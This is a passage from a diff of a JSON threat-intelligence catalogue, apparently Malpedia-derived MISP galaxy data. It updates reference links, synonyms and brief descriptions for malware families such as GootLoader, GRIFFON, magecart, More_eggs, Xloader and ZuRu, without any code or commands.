encrypted, but simply reamed. If the extension is removed, the files can be opened as usual.\r\n\r\nAs of at least version 1.5, STRRAT has an implemented encryption routine.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat", - "https://www.gdatasoftware.com/blog/strrat-crimson" + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://www.jaiminton.com/reverse-engineering/strrat", + "https://twitter.com/MsftSecIntel/status/1395138347601854465", + "https://www.gdatasoftware.com/blog/strrat-crimson", + "https://isc.sans.edu/diary/rss/27798" ], "synonyms": [], "type": [] @@ -4738,6 +5626,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" ], "synonyms": [], @@ -4858,6 +5747,21 @@ "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3", "value": "EVILNUM (Javascript)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader", + "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/", + "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/", + "https://community.riskiq.com/article/f5d5ed38" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5b2569e5-aeb2-4708-889f-c6d598bd5e14", + "value": "GootLoader" + }, { "description": "grelos is a skimmer used for magecart-style attacks.", "meta": { @@ -4874,19 +5778,22 @@ "value": "grelos" }, { - "description": "", + "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", "https://twitter.com/ItsReallyNick/status/1059898708286939136", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout" + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/" + ], + "synonyms": [ + "Harpy" ], - "synonyms": [], "type": [] }, "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd", @@ -4905,6 +5812,32 @@ "uuid": "36b0f1a0-29a4-4ec5-bca2-18a241881d49", "value": "inter" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.jeniva", + "https://imp0rtp3.wordpress.com/2021/08/12/tetris/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b0631a44-3264-429d-b8bc-3a27e27be305", + "value": "Jeniva" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.jetriz", + "https://imp0rtp3.wordpress.com/2021/08/12/tetris/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9e6a0a54-8b55-4e78-a3aa-15d1946882e1", + "value": "Jetriz" + }, { "description": "", "meta": { @@ -4955,24 +5888,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://community.riskiq.com/article/743ea75b/description", "https://sansec.io/research/magento-2-persistent-parasite", "https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf", "https://sansec.io/research/north-korea-magecart", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.riskiq.com/blog/labs/magecart-nutribullet/", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://twitter.com/AffableKraut/status/1385030485676544001", "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", - "https://www.riskiq.com/blog/labs/magecart-nutribullet/", + "https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter", + "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html", "https://community.riskiq.com/article/fda1f967", "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", + "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/", - "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", + "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/", + "https://twitter.com/AffableKraut/status/1415425132080816133?s=20", + "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/", "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", "https://www.goggleheadedhacker.com/blog/post/14", "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", + "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", "https://community.riskiq.com/article/5bea32aa", "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/", @@ -4991,9 +5932,10 @@ "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", + "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/", "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", - "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", + "https://twitter.com/MBThreatIntel/status/1416101496022724609", "https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/", "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/" @@ -5004,32 +5946,46 @@ "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", "value": "magecart" }, + { + "description": "MiniJS is a very simple JavaScript-based first-stage backdoor. \r\nThe backdoor is probably distributed via spearphishing email. \r\nDue to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.minijs", + "https://www.virustotal.com/gui/file/0ce9aadf6a3ffd85d6189590ece148b2f9d69e0ce1c2b8eb61361eb8d0f98571/details" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5fd2f4f0-0591-45bb-a843-c194d5e294cd", + "value": "MiniJS" + }, { "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", + "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", + "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire", + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://attack.mitre.org/software/S0284/", "https://github.com/eset/malware-ioc/tree/master/evilnum", - "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", - "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", - "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", - "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", - "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", - "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", - "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", - "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", - "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", - "https://blog.morphisec.com/cobalt-gang-2.0" + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [ "SKID", @@ -5076,11 +6032,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", "https://www.intrinsec.com/deobfuscating-hunting-ostap/", "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py" ], "synonyms": [], @@ -5174,13 +6132,27 @@ "uuid": "f6c80748-1cce-4f6b-92e9-f8a04ff3464a", "value": "Starfighter (Javascript)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.swid", + "https://imp0rtp3.wordpress.com/2021/08/12/tetris/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d4be22cf-497d-46a0-8d57-30d10d9486e3", + "value": "Swid" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/" ], "synonyms": [], "type": [] @@ -5241,6 +6213,19 @@ "uuid": "a15e7c49-4eb6-46f0-8f79-0b765d7d4e46", "value": "Unidentified JS 004" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_005", + "https://blogs.jpcert.or.jp/en/2021/07/water_pamola.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a797e9b9-cb3f-484a-9273-ac73e9ea1e06", + "value": "Unidentified JS 005 (Stealer)" + }, { "description": "", "meta": { @@ -5258,12 +6243,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.valak", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", "https://twitter.com/malware_traffic/status/1207824548021886977", "https://security-soup.net/analysis-of-valak-maldoc/", "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", "https://unit42.paloaltonetworks.com/valak-evolution/", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", "https://blog.talosintelligence.com/2020/07/valak-emerges.html" ], "synonyms": [ @@ -5292,6 +6279,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", @@ -5309,7 +6297,8 @@ "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://objective-see.com/blog/blog_0x49.html" + "https://objective-see.com/blog/blog_0x49.html", + "https://www.youtube.com/watch?v=1NkzTKkEM2k" ], "synonyms": [], "type": [] @@ -5337,9 +6326,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c", "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" + "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html", + "https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20" ], "synonyms": [ "SurfBuyer" @@ -5406,6 +6397,19 @@ "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", "value": "Coldroot RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.convuster", + "https://securelist.com/convuster-macos-adware-in-rust/101258/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3819ded3-27ac-4e2f-9cd6-c6ef1642599b", + "value": "Convuster" + }, { "description": "", "meta": { @@ -5468,6 +6472,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", @@ -5543,6 +6548,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat", "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", "https://objective-see.com/blog/blog_0x61.html" ], "synonyms": [], @@ -5570,6 +6576,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest", + "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://github.com/gdbinit/evilquest_deobfuscator", "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/", "https://objective-see.com/blog/blog_0x59.html", @@ -5603,11 +6611,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher", - "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", - "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/", "https://objective-see.com/blog/blog_0x4F.html", + "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/", + "https://securelist.com/finspy-unseen-findings/104322/", "https://objective-see.com/blog/blog_0x5F.html", - "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/" ], "synonyms": [], "type": [] @@ -5899,6 +6908,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://twitter.com/BitsOfBinary/status/1321488299932983296", "https://twitter.com/BitsOfBinary/status/1337330286787518464", "https://www.anquanke.com/post/id/223817" @@ -5951,6 +6961,7 @@ "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], @@ -6090,8 +7101,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer", - "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/", + "https://objective-see.com/blog/blog_0x64.html", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508", + "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/", + "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/", "https://securelist.com/shlayer-for-macos/95724/" ], "synonyms": [], @@ -6279,8 +7295,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", + "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html", + "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/", + "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/", - "https://objective-see.com/blog/blog_0x5F.html" + "https://objective-see.com/blog/blog_0x5F.html", + "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/" ], "synonyms": [], "type": [] @@ -6288,6 +7308,26 @@ "uuid": "041aee7f-cb7a-4199-9fe5-494801a18273", "value": "XCSSET" }, + { + "description": "Xloader is a Rebranding of Formbook malware (mainly a stealer), available for macOS as well.\r\n\r\nFormbook has a \"magic\"-value FBNG (FormBook-NG), while Xloader has a \"magic\"-value XLNG (XLoader-NG). This \"magic\"-value XLNG is platform-independent.\r\n\r\n\r\nNot to be confused with apk.xloader or ios.xloader.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader", + "https://twitter.com/krabsonsecurity/status/1319463908952969216", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", + "https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/", + "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/", + "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/", + "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/" + ], + "synonyms": [ + "Formbook" + ], + "type": [] + }, + "uuid": "d5f2f6ad-2ed0-42d4-9116-f95eea2ab543", + "value": "Xloader" + }, { "description": "", "meta": { @@ -6316,6 +7356,20 @@ "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b", "value": "Yort" }, + { + "description": "A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system an pulls additional payload(s).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.zuru", + "https://objective-see.com/blog/blog_0x66.html", + "https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bd293592-d2dd-4fdd-88e7-6098e0bbb043", + "value": "ZuRu" + }, { "description": "Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.", "meta": { @@ -6367,6 +7421,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode", + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a", "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf" @@ -6397,9 +7452,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", - "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", + "https://securelist.com/apt-trends-report-q1-2021/101967/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", + "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], @@ -6458,6 +7514,7 @@ "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/", "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", @@ -6495,9 +7552,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", + "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf", "https://vblocalhost.com/uploads/VB2020-46.pdf" ], - "synonyms": [], + "synonyms": [ + "BoBoStealer" + ], "type": [] }, "uuid": "6f0f034a-13f1-432d-bc70-f78d7f27f46f", @@ -6816,6 +7878,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" ], "synonyms": [], @@ -6842,6 +7905,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://youtu.be/pBDu8EGWRC4?t=2492", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", @@ -6900,8 +7964,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", - "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/", + "https://blog.minerva-labs.com/sload-targeting-europe-again", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/", "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", @@ -6910,7 +7974,8 @@ "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/", "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" + "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html", + "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy" ], "synonyms": [ "Starslord" @@ -7105,7 +8170,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", 